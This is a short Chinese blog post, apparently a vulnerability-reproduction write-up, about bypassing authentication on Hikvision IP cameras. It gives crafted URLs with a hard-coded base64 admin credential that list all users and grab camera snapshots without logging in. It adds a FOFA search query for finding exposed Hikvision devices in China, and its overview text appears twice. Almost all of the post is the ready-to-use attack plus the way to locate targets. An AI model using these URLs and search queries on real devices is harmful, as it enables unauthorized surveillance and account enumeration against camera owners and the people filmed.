海康威视摄像头漏洞复现
概述:通过构造url进行检索所有用户、屏幕截图、配置文件下载命令:检索所有用户:IP/Security/users?auth=YWRtaW46MTEK获取镜头快照而不进行身份验证:IP/onvif-http/snapshot?auth=YWRtaW46MTEK复现:fofa搜索 app=”HIKVISION-视频监控” && country=”CN”需要登录构造url绕过
您已发布 11篇文章作品写文章
概述:通过构造url进行检索所有用户、屏幕截图、配置文件下载命令:检索所有用户:IP/Security/users?auth=YWRtaW46MTEK获取镜头快照而不进行身份验证:IP/onvif-http/snapshot?auth=YWRtaW46MTEK复现:fofa搜索 app=”HIKVISION-视频监控” && country=”CN”需要登录构造url绕过